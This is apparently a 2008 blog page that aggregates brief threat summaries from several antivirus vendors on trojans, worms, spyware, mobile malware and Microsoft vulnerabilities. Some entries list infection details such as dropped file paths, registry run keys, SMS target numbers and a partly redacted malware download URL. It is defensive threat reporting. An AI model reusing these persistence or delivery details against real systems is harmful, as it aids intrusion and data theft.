Trojan-Downloader:W32/Swizzor.FG - Trojan-Downloader:W32/Swizzor.FG at F-Secure
Swizzor is a small trojan-downloader that can end up on a user's system when they are browsing the Web. The
trojan silently downloads and installs additional trojan downloaders and adware components.
...
Backdoor:W32/IRCBot.BNZ - Backdoor:W32/IRCBot.BNZ at F-Secure
IRCBot.BNZ is a backdoor. It can be instructed to scan for vulnerable target machines, update itself, as well
as download and execute arbitrary files.
...
Packed:W32/Tibs.GU - Packed:W32/Tibs.GU at F-Secure
Files that are detected as Packed.Win32.Tibs.gu have similar functionality to Email-Worm.Win32.Zhelatin
variants....
Trojan-Spy:W32/ZBot.HS - Trojan-Spy:W32/ZBot.HS at F-Secure
Trojan-Spy:W32/ZBot.HS is a trojan-spy. Trojan-spy applications attempt to steal online banking
login-information and other sensitive data from the infected computer.
...
Trojan-Downloader.SWF.Gida.A - Trojan-Downloader.SWF.Gida.A at F-Secure
Trojan-Downloader.SWF.Gida.A is detection of Adobe Flash files that have seen served over Hypertext Transfer
Protocol (HTTP) and linked from advertisement sites. It injects additional HTML content to the viewed webpage
which then serves malicious content.
...
IM-Worm:W32/Sohanad - IM-Worm:W32/Sohanad at F-Secure
IM-Worm:W32/Sohanad is a family of worms that spread via instant messaging software, primarily Yahoo Messenger.
...
Trojan-PSW:W32/Lmir.BPG - Trojan-PSW:W32/Lmir.BPG at F-Secure
This is typical Trojan that logs keyboard strikes (key logger) and URLs visited by the user.
...
Trojan:W32/AutoIt.BN - Trojan:W32/AutoIt.BN at F-Secure
Trojan:W32/Autoit.BN is a trojan that copies itself to USB memory sticks, deletes anti-virus software, and
changes system settings.
...
Trojan-Spy:W32/Banker.GMH - Trojan-Spy:W32/Banker.GMH at F-Secure
This Trojan steals banking information and has the capability to update itself.
...
Exploit:PHP/Preamble - Exploit:PHP/Preamble at F-Secure
Exploit:PHP/Preamble is a detection for a family of various PHP scripts. The scripts are used to test whether
a particular site is vulnerable for a Remote File Inclusion (RFI) exploitation.
...
Worm:SymbOS/HatiHati.A - Worm:SymbOS/HatiHati.A at F-Secure
HatiHati.A is a worm-like application that spreads via MMC cards. Once the worm copies itself to a new device,
it starts sending a very high volume of SMS messages to a predefined number. In most instances, the number
to which HatiHati.A is attempting to send is +3396003964.
...
Email-Worm:W32/Zhelatin.TQ - Email-Worm:W32/Zhelatin.TQ at F-Secure
Zhelatin.TQ, like its predecessors, is a bot that communicates via Overnet P2P protocol and is mainly used to
send spam....
Trojan-Downloader:W32/MyDrill.A - Trojan-Downloader:W32/MyDrill.A at F-Secure
MyDrill.A is detection for files used as part of a Malaysian Cyber Security Drill that took place during 2007.
MyDrill.A are harmless test files. Detection was added for the purpose of the drill.
...
Trojan:W32/Agent.DXH - Trojan:W32/Agent.DXH at F-Secure
Trojan:W32/Agent.DXH or Trojan.Win32.Agent.dxh contains an encrypted payload. Agent.DXH appears to be a
component of a malware that targets Italian computer users.
...
Trojan:W32/Renos.H - Trojan:W32/Renos.H at F-Secure
Trojan:W32/Renos.H attempts to lure the computer user into downloading "rogueware" by presenting pop-up
windows that warn of a supposed threat. In addition, Renos.H modifies the computer's hosts-file in such a way
that accessing websites of many antivirus vendors is blocked.
...
Trojan-Downloader:W32/Agent.ICF - Trojan-Downloader:W32/Agent.ICF at F-Secure
Trojan-Downloader:W32/Agent.ICF attempts to download files. It also drops files and writes to the system
registry....
Trojan:W32/Kine - Trojan:W32/Kine at F-Secure
Trojan:W32/Kine is a family of data stealing trojans.
...
Trojan:W32/Delf.AOO - Trojan:W32/Delf.AOO at F-Secure
Trojan:W32/Delf.AOO is a trojan. This malware uses a hidden browser process (e.g. iexplorer.exe) to hide
itself from the systems' process list. It terminates antivirus applications by searching for antivirus company
strings in all application window title headers.
...
Email-Worm:W32/Agent.BC - Email-Worm:W32/Agent.BC at F-Secure
This malware normally arrives downloaded by other trojan packages. Depending on the supplied parameter, this
malware can send numerous Spam messages.
...
Worm:SymbOS/Beselo.B - Worm:SymbOS/Beselo.B at F-Secure
Beselo.B is an MMS and Bluetooth worm that operates on Symbian S60 Second Edition devices. Beselo.B spreads
via MMS messages and Bluetooth using the filenames beauty.jpg, sex.mp3, or love.rm.
...
Trojan-Downloader:W32/Agent.ACL - Trojan-Downloader:W32/Agent.ACL at F-Secure
This trojan is usually dropped by other malware installation packages. On execution, it downloads and execute
another trojan file on the system.
...
Trojan.Swfpharm - Trojan.Swfpharm at Norton Symantec
Trojan.Swfpharm is a Trojan horse that attempts to modify settings on 2Wire routers and redirects users to
potentially malicious Web sites.
...
W32.Golem.A - W32.Golem.A at Norton Symantec
W32.Golem.A is a virus that spreads by infecting .exe files on all local and mapped drives except the system
drive....
Adware.Superiorads - Adware.Superiorads at Norton Symantec
BehaviorAdware.Superiorads is an adware program that installs a Browser Helper Object for Internet Explorer
and displays advertisements on the computer.
...
W32.IRCBot.DCN - W32.IRCBot.DCN at Norton Symantec
W32.IRCBot.DCN is a worm that spreads through network shares and by exploiting certain vulnerabilities. It
also opens a back door on the compromised computer.
...
Spyware.PCGhost - Spyware.PCGhost at Norton Symantec
BehaviorSpyware.PCGhost is a spyware program that logs keystrokes, tracks internet activity, and records mouse
clicks....
SpywarePro - SpywarePro at Norton Symantec
BehaviorSpywarePro is a misleading application that may give exaggerated reports of threats on the computer.
...
SpywareSweeperPro - SpywareSweeperPro at Norton Symantec
BehaviorSpywareSweeperPro is a misleading application that may give exaggerated reports of threats on the
computer....
MalwareCore - MalwareCore at Norton Symantec
BehaviorMalwareCore is a misleading application that may give exaggerated reports of threats on the computer.
...
Bloodhound.Exploit.181 - Bloodhound.Exploit.181 at Norton Symantec
Bloodhound.Exploit.181 is a heuristic detection for Works files attempting to exploit the Microsoft Excel
Conditional Formatting Values Remote Code Execution Vulnerability (BID 28170).
...
W32/Traxg@MM - W32/Traxg@MM at McAfee
When executed, this worm drops a copy of itself in the following folder:%System%\Fonts\27DE5.com [File name
used is random]Note:%System% refers to the windows system folderIt then creates the following registry entry
to ensure its execution at system startup:
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunTempCom...
SymbOS/Beselo - SymbOS/Beselo at McAfee
--- Update January 23, 2008 -- The risk assessment of this threat was updated to Low-Profiled due to media
attention. To Obtain an ED for this threat please visit:http://www.webimmune.net/extra/getextra.
aspx ...
KillJWS - KillJWS at McAfee
-- Update January 18, 2008 --The risk assessment of this threat has been updated to Low-Profiled due to media
attention at:http://www.webuser.co.uk/news/174689.html--Upon execution, the trojan drops the following files
into %WinDir% folder.%WinDir%\Config\svchost.exe%WinDir%\system32\securityService.dll%WinDir%\mci32.exe(where
%WinDi...
PWS-LegMir.gen.k - PWS-LegMir.gen.k at McAfee
PWS-LegMir.gen.k drops PWS-LegMir.gen.k.dll which steals passwords from multiple games. It will
spread using autorun.inf in the root folder of available drives in the system and download updates
of itself.The following files are dropped:%DRIVELETTER%\h2.com%DRIVELETTER%\autorun.inf%TEMPDIR%\ee2m.
dll%SYSTEM%\kavo.exe%SYSTEM%...
JS/Exploit-YahooGrid - JS/Exploit-YahooGrid at McAfee
JS/Exploit-YahooGrid is a generic detection for YMPDataGrid (datagrid.dll) and YMGMediaGridAx (mediagridax.
dll) ActiveX controls buffer overflow vulnerability in Yahoo! Music Jukebox and Yahoo! Messenger.The
buffer overflow vulnerabilities occurs while supplying a long string to the AddImage, AddButton or AddBitmap
function...
PWS-LegMir.gen.k.dll - PWS-LegMir.gen.k.dll at McAfee
PWS-LegMir.gen.k.dll is dropped by PWS-LegMir.gen.k. It steals password from multiple games. It may also
detect and terminate antivirus applications.The following antivirus applications are detected and terminated:
KAV (Kaspersky)RAV (Rising)AVP (Kaspersky)KAVSVC
(Kaspersky) ...
W32/Atin.worm - W32/Atin.worm at McAfee
This worm has an icon of a folder.On execution, this worm copies itself into every folder on all drives, with
the same name as that of the host folder.It also copies itself into removable drives.The worm changes the
Window Title of Internet Explorer, by adding the following registry key.
HKEY_CURRENT_USER\Software\Microsoft\Internet E...
Puper!677223db - Puper!677223db at McAfee
The scandal happened in HongKong is being used to entice users to access fake codes and install this
malware.This Trojan is pretended with a windows media file icon .Once running ,
the trojan access the following webpage :http://69.50.164.54/this/[removed]/stereo/music.
phpDownload the following file:http://d...
Linux/Exploit-vmsplice - Linux/Exploit-vmsplice at McAfee
This detection covers CVE-2008-0600.Linux/Exploit-vmsplice elevates a user privilege to root.It exploits a
kernel vulnerability through the use of vmsplice() system function.More information about this vulnerability
at:http://www.avertlabs.com/research/blog/index.
php/2008/02/13/analyzing-the-linux-kernel-vmsplice-exploit/...
Exploit-PDF.b - Exploit-PDF.b at McAfee
-- Update February 11, 2008 --The risk assessment of this threat has been updated to Low-Profiled due to
media attention at:http://www.computerworld.com/action/article.
do?command=viewArticleBasic&articleId=9061938&intsrc=news_ts_head--These maliciously crafted PDF files
exploits a buffer overflow vulnerability in Adobe Reader wh...
Generic RootKit.h - Generic RootKit.h at McAfee
This detection, Generic RootKit.h, is for several specific trojan variants. So this description is meant as a
general guide. Rootkits are programs (device drivers) that can potentially be used with any malware to
hide, or stealth, files, processes, registry keys, and network connections. Additionally, they make it harder
to det...
W32/Autorun.worm.bx - W32/Autorun.worm.bx at McAfee
This detection is for a worm.It attempts to spread to removable drives by creating an autorun.inf file, which
will run the worm automatically, if a systems which use the removable drive are set to Autorun.This worm adds
the following files and registry entries to load itself on startup.Files:c:\WINDOWS\system32\amvo.exec:
\WINDOWS\sys...
W32/Caffer@MM - W32/Caffer@MM at McAfee
-- Update February 21, 2008 --The risk assessment of this threat has been updated to Low-Profiled due to media
attention at:http://www.repubblica.it/2008/02/sezioni/cronaca/truffa-mail/truffa-mail/truffa-mail.htmlAn
English translation is available here -- The malware is compressed with Npack in order to protect its
behaviour from to...
WinCE/Infojack - WinCE/Infojack at McAfee
WinCE/InfoJack is distributed in a file named "小游戏1. cab".Fig 1 - WinCE/InfoJack is
installed with a collection of legitimate gamesWinCE/InfoJack installs to the handset and any installed memory
card. The following files will be installed:\Windows\mservice.exe \Windows\setup.cfg
\Windows\StartUp\mservice.ln...
Puper!69ccd856 - Puper!69ccd856 at McAfee
Once running, the Trojan adds the following registry key to install a fake security Toolbar,
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Toolbar
"{81705D67-3F73-4983-859B-97D0922E5ABE}"
When the user clicks on the toolbar button “Block adware / popups”,...
BackDoor-DNM - BackDoor-DNM at McAfee
Upon execution, this trojan copies itself into the %System32% folder as "CbEvtSvc.exe"It then launches the new
executable as a new system service.Files Added%system32%\CbEvtSvc.exeRegistry entries
added
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\CbEvtSvc
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\CbEvtSvc\Enum
HKEY...
W32/Scrapkut.worm - W32/Scrapkut.worm at McAfee
--- Update March 3, 2008 -- The risk assessment of this threat was updated to Low-Profiled due to media
attention. To receive an extra.dat file for this threat please visit: https://www.webimmune.net/extra/getextra.
aspx The downloader component of the worm has the following attributes:File size: 239,616 bytes FileName:
flashx_p....
SomeFun - SomeFun at McAfee
On execution, this program displays the following message box
Meanwhile, it creates a text file on the desktop with the name "OWNED BY EVIL KID!!!.TXT", with the following
text in it. On every execution of this trojan, the same text is appended to this file.
...
W32/Realcen@M - W32/Realcen@M at McAfee
When executed, this worm displays the following message: The worm drops then following files:C:\autorun.
infC:\RECYCLER\Oil.exe%System%\windows.exe%System%\WinMail.vxd%System%\WinMS.vxd%System%\WinSrc.vxdNote:
%System% is a variable location and refers to the windows system directoryThe following registry entries are
modified to e...
SymbOS/SmsSend.F - SymbOS/SmsSend.F at McAfee
SymbOS/SmsSend.F is distributed as a component of SymbOS/Multidropper.CR. SymbOS/SmsSend.F sends an SMS
without user permission to the number 17001002. The message will register a new QQ instant messaging account
for the user....
SymbOS/MultiDropper.CR - SymbOS/MultiDropper.CR at McAfee
SymbOS/MultiDropper.CR is distributed as a SIS file. All of the component malware is set to run on
installation. The interaction of the various component malware works to extort money from the user.
SymbOS/MultiDropper.CR attempts to sign the user up to a QQ account. It also forwards all SMS to the
malware author. Inco...
SymbOS/Kiazha.A - SymbOS/Kiazha.A at McAfee
-- Update March 05, 2008 --The risk assessment of this threat has been updated to Low-Profiled due to media
attention at:http://www.channelregister.co.uk/2008/03/05/mobile_ransomware_trojan/--SymbOS/Kiazha.A is
distributed within SymbOS/MultiDropper.CR. After installation SymbOS/Kiazha.A is run immediately. After a
delay SymbOS/Kiazh...
StartPage-KG - StartPage-KG at McAfee
StartPage-KG will write itself to the following location:%WINDOWS%\rundll32.exeThe following registry
entries are modified:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\Microsoft Windows
Driver: "%WINDOWS%\rundll32.exe"HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Start Page: "http:
//www.[removed]...
Monagrey - Monagrey at McAfee
-- Update March 4, 2008 --The risk assessment of this threat has been updated to Low-Profiled due to
media attention at:http://www.scmagazineus.
com/New-virus-tries-to-dupe-victims-into-googling-its-name/article/107612/--Monagrey is a trojan which
modifies IE start page and prevents common applications from running.It will modify...
TROJ_DROPPER.EUO - TROJ_DROPPER.EUO at Trend Micro
This Trojan may be dropped by other malware.Upon execution, this Trojan creates a folder. It also drops a file
which Trend Micro detects as TROJ_DROPPER.EUO.
...
TROJ_BAGLE.QU - TROJ_BAGLE.QU at Trend Micro
This Trojan may be dropped by other malware. It may be downloaded unknowingly by a user when visiting
malicious Web sites.It creates folders. It modifies the affected system's registry to perform certain actions
on tha affected system, such as automatically executing at every system startup.It hides files, processes,
and/or registr...
TROJ_DLOADER.CUA - TROJ_DLOADER.CUA at Trend Micro
...
PE_TRATS.E-O - PE_TRATS.E-O at Trend Micro
This file infector may be downloaded unknowingly from certain Web sites.Upon execution, this file infector
creates a folder, and drops several files. It registers itself as a Browser Helper Object (BHO) to ensure its
automatic execution every time Internet Explorer is run. It also modifies a registry entry to enable its
automatic ex...
SWF_ADHIJACK.E - SWF_ADHIJACK.E at Trend Micro
This malicious Shockwave Flash (.SWF) object file may arrive on a system via email informing users that they
have received a postcard. Below is a screenshot of the object it displays: Once clicked, this object file
attempts to modify the 2wire modem localhost table to perform pharming against against a certain bank. It does
this by p...
TROJ_SMALL.EAI - TROJ_SMALL.EAI at Trend Micro
...
TROJ_DLOADER.MJZ - TROJ_DLOADER.MJZ at Trend Micro
...
JS_AGENT.OEZ - JS_AGENT.OEZ at Trend Micro
...
TROJ_AGENT.ERP - TROJ_AGENT.ERP at Trend Micro
...
WORM_SOCKS.D - WORM_SOCKS.D at Trend Micro
This worm arrives via email messages spammed by another malware or by a malicious user. It may also be dropped
by other malware.Instead of attaching copies of itself to email messages, this worm asks users to click a link
in the message. This is an effective way for it to bypass email applications that scan for malicious
attachments....
Autorun.RS - Autorun.RS at Panda
It downloads several variants belonging to the Lineage family, which is designed to steal passwords related to
online games. It also downloads an update of itself and uses several techniques in order to make its detection
more difficult. It spreads through local, removable and mapped drives.
...
MS08-017 - MS08-017 at Panda
It is a group of critical vulnerabilities in Office Web Components 2000, which allows hackers to gain remote
control of the affected computer with the same privileges as the logged on user.
...
MS08-016 - MS08-016 at Panda
...
MS08-015 - MS08-015 at Panda
It is a critical vulnerability in several versions of Outlook, which allows hackers to gain remote control of
the affected computer with the same privileges as the logged on user.
...
MS08-014 - MS08-014 at Panda
It is a group of critical vulnerabilities in several versions of Excel, which allows hackers to gain remote
control of the affected computer with the same privileges as the logged on user.
...
EbayRob.B - EbayRob.B at Panda
Its main objective is to steal the information entered in certain websites, such as Ebay, redirecting the user
to another one that imitates the original one. Then, it sends the gathered data to its author. It does not
spread automatically by its own means.
...
Winfake.A - Winfake.A at Panda
It passes itself off as a Word document, in order to deceive users making them think it is an inoffensive
document. It carries out several modifications in the Windows Registry, which prevent the computer from
working properly. It spreads through mapped drives.
...
FakeDeath.A - FakeDeath.A at Panda
It reaches the computer passing itself off as some news related to the fake death of Fidel Castro. It
downloads several variants of Trojans belonging to the Banker family to the affected computer and distribute
them through the shared directories belonging to several programs such as mIRC, eDonkey or KaZaA.
...
Banker.KTG - Banker.KTG at Panda
Its main objective is to steal passwords from the affected computer, which can be of any type. It reaches the
computer downloaded by a variant belonging to the Trojan Nabload and passing itself off as a video. It does
not spread automatically by its own means.
...
MonaRona.A - MonaRona.A at Panda
It downloads the Application/Unigray in the computer, which is a program that detects unexisting malware in
the affected computer and prevents the users from working properly with the computer, as it ends certain
programs, such as several Office applications. It does not spread automatically by its own means.
...
0 writebacks [03/19/2008 11:05]
[]
permanent link
|
|
| July 2010 |
|---|
| Sun |
Mon |
Tue |
Wed |
Thu |
Fri |
Sat |
| |
|
|
|
1 |
2 |
3 |
| 4 |
5 |
6 |
7 |
8 |
9 |
10 |
| 11 |
12 |
13 |
14 |
15 |
16 |
17 |
| 18 |
19 |
20 |
21 |
22 |
23 |
24 |
| 25 |
26 |
27 |
28 |
29 |
30 |
31 |
Rss version
|
